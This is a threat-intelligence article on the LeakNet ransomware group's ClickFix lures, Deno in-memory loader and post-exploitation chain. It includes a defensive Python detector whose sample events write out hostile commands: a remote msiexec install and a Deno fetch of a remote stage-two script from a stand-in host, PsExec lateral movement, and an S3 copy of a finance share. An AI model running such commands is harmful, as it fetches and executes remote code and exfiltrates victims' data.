Ransomware group LeakNet adopts ClickFix social engineering through compromised websites and deploys a novel Deno-based in-memory loader, marking a strategic shift away from third-party initial access brokers.
The ransomware operation known as LeakNet has adopted a new attack methodology that combines social engineering with sophisticated in-memory execution techniques, according to a technical report from ReliaQuest published March 17, 2026.
ClickFix Social Engineering Through Compromised Websites
LeakNet has integrated the ClickFix social engineering tactic as its primary initial access method, delivered through legitimate but compromised websites. This approach tricks users into manually executing malicious commands by presenting fake CAPTCHA verification checks that instruct victims to copy and paste an "msiexec.exe" command into the Windows Run dialog.
This marks a significant departure from LeakNet's previous reliance on stolen credentials obtained through initial access brokers (IABs). The shift offers several strategic advantages:
- Reduced dependency on third parties: Eliminates operational bottlenecks associated with waiting for valuable accounts to become available on the market
- Lower acquisition costs: Decreases per-victim acquisition expenses
- Broader targeting capability: Enables attacks across multiple industry verticals rather than being confined to specific sectors
The use of compromised legitimate websites to deliver ClickFix is particularly concerning because the hosting domains carry established reputation and age, so they do not trip the domain-reputation, newly-registered-domain and proxy-category checks that typically flag attacker-owned infrastructure, making network-level detection more challenging for defenders.
In-Memory Execution with Deno JavaScript Runtime
Once initial access is achieved, LeakNet employs a staged command-and-control (C2) loader built on the Deno JavaScript runtime. This loader executes malicious payloads directly in memory, minimizing on-disk evidence and evading file-based detection that relies on scanning dropped binaries.
The Deno-based loader performs several critical functions:
- System fingerprinting: Identifies the compromised system's characteristics
- External payload retrieval: Contacts external servers to fetch next-stage malware
- Continuous execution loop: Enters a polling loop that repeatedly fetches and executes additional code through Deno
This approach represents a "bring your own runtime" (BYOR) strategy: the only artifact that lands on disk is a legitimate runtime binary, while the hostile logic exists solely as fetched script executing in memory, allowing the malware to operate with minimal footprint on the target system.
Consistent Post-Exploitation Methodology
Regardless of the initial access vector, LeakNet follows a repeatable post-exploitation sequence:
- DLL side-loading: Uses legitimate applications to load malicious DLLs
- Lateral movement: Employs PsExec for network propagation
- Credential harvesting: Executes "cmd.exe /c klist" to list the Kerberos tickets cached for the current logon session, revealing which accounts and services are already reachable without requesting new credentials or triggering fresh authentication events
- Data exfiltration: Utilizes Amazon S3 buckets to stage and exfiltrate data, exploiting the appearance of normal cloud traffic
- Encryption: Deploys ransomware to encrypt victim data
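The stages above (the pasted msiexec command from the Run dialog, the Deno runtime fetching remote code, klist under cmd.exe, PsExec, and staging to S3) all surface as process-creation telemetry, which is where a defender would look for them. The following is an added detection example, not ReliaQuest's or LeakNet's code: it classifies Sysmon Event ID 1-style events (image, parent image, command line) into chain stages and counts how many distinct tactics appear on one host. The event shape, the exact matching patterns (for example that a Run-dialog launch shows explorer.exe as parent, that Deno is invoked with a remote URL, and that S3 uploads go through the AWS CLI) and the sample events are assumptions constructed for illustration, not observed indicators.

```python
"""Classify process-creation events into LeakNet-style chain stages.

Added illustration, not ReliaQuest's or LeakNet's code. Event shape
(Sysmon Event ID 1 style) and matching patterns are assumptions; tune
them to your own telemetry before relying on them.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    command_line: str


def _base(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> Optional[str]:
    """Return a 'tactic:technique' label if the event matches one chain stage."""
    img, parent, cmd = _base(ev.image), _base(ev.parent_image), ev.command_line
    low = cmd.lower()
    # ClickFix: the Run dialog is hosted by explorer.exe, so a pasted msiexec
    # command shows up as explorer.exe -> msiexec.exe with a remote package URL.
    if img == "msiexec.exe" and parent == "explorer.exe" and REMOTE_URL.search(cmd):
        return "initial-access:clickfix-msiexec"
    # BYOR loader: the Deno runtime pulling script from a remote origin (assumed form).
    if img == "deno.exe" and REMOTE_URL.search(cmd):
        return "execution:deno-remote-loader"
    # Kerberos ticket enumeration exactly as the report describes it.
    if img == "cmd.exe" and re.search(r"/c\s+klist\b", low):
        return "discovery:klist"
    # PsExec client or the PSEXESVC service it installs on the target.
    if img in ("psexec.exe", "psexec64.exe", "psexesvc.exe"):
        return "lateral-movement:psexec"
    # Staging to S3 via the AWS CLI or a direct bucket URL (assumed tooling).
    if "s3.amazonaws.com" in low or re.search(r"\baws\s+s3\s+(cp|sync)\b", low):
        return "exfiltration:s3"
    return None


def detect_chain(events: List[ProcEvent]) -> List[Tuple[str, str]]:
    """Return matched events as (label, command_line) in observed order."""
    hits = []
    for ev in events:
        label = classify(ev)
        if label:
            hits.append((label, ev.command_line))
    return hits


def chain_score(hits: List[Tuple[str, str]]) -> int:
    """Count distinct tactics seen; three or more on one host is a strong signal."""
    return len({label.split(":")[0] for label, _ in hits})


# Constructed sample telemetry for one host; these are not real indicators.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\msiexec.exe", r"C:\Windows\explorer.exe",
              "msiexec.exe /i https://example.invalid/verify.msi /qn"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe", r"C:\Windows\explorer.exe",
              "msiexec.exe /i C:\\Installers\\vendor.msi /qn"),   # benign local install
    ProcEvent(r"C:\Users\Public\deno.exe", r"C:\Windows\System32\msiexec.exe",
              "deno.exe run --allow-all https://example.invalid/stage2.ts"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Users\Public\deno.exe",
              "cmd.exe /c klist"),
    ProcEvent(r"C:\Tools\PsExec64.exe", r"C:\Windows\System32\cmd.exe",
              r"PsExec64.exe \\FILESRV01 -s cmd.exe"),
    ProcEvent(r"C:\Program Files\Amazon\AWSCLIV2\aws.exe", r"C:\Windows\System32\cmd.exe",
              "aws s3 cp D:\\share\\finance s3://stagebucket/ --recursive"),
]

if __name__ == "__main__":
    found = detect_chain(SAMPLE_EVENTS)
    for label, cmd in found:
        print(f"{label:<34} {cmd}")
    print("distinct tactics:", chain_score(found))
```

The benign local msiexec install is deliberately included and is not flagged: msiexec itself is noise on any managed fleet, and the signal is the combination of Run-dialog parentage with a remote package URL. Scoring distinct tactics per host rather than alerting on each rule separately is what turns a set of individually weak matches into the repeatable sequence the report describes.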
Microsoft Teams-Based Phishing Variant
ReliaQuest also observed an intrusion attempt using Microsoft Teams-based phishing to socially engineer users into launching a similar Deno-based payload chain. While this activity remains unattributed, it suggests either an expansion of LeakNet's initial access vectors or adoption of the technique by other threat actors.
Strategic Implications for Ransomware Operations
LeakNet's adoption of ClickFix represents both the first documented expansion of the group's initial access capability and a meaningful strategic shift. By moving away from IABs, LeakNet removes a dependency that naturally constrained how quickly and broadly it could operate.
The group, which emerged in November 2024 and describes itself as a "digital watchdog" focused on internet freedom and transparency, has also targeted industrial entities according to data from Dragos.
Broader Ransomware Landscape Context
Google's Threat Intelligence Group recently identified Qilin, Akira, Cl0p, Play, SafePay, INC Ransom, Lynx, RansomHub, DragonForce, and Sinobi as the top 10 ransomware brands with the most victims claimed on their data leak sites. The report noted that in a third of incidents, initial access involved exploitation of vulnerabilities, particularly in common VPNs and firewalls.
Despite ongoing disruption efforts, ransomware actors remain highly motivated, though indicators suggest declining profitability is pushing some groups to target smaller organizations with higher-volume attacks rather than large enterprises.
The combination of social engineering through compromised websites and in-memory execution techniques represents an evolution in ransomware tactics that emphasizes stealth, speed, and reduced reliance on external infrastructure or services.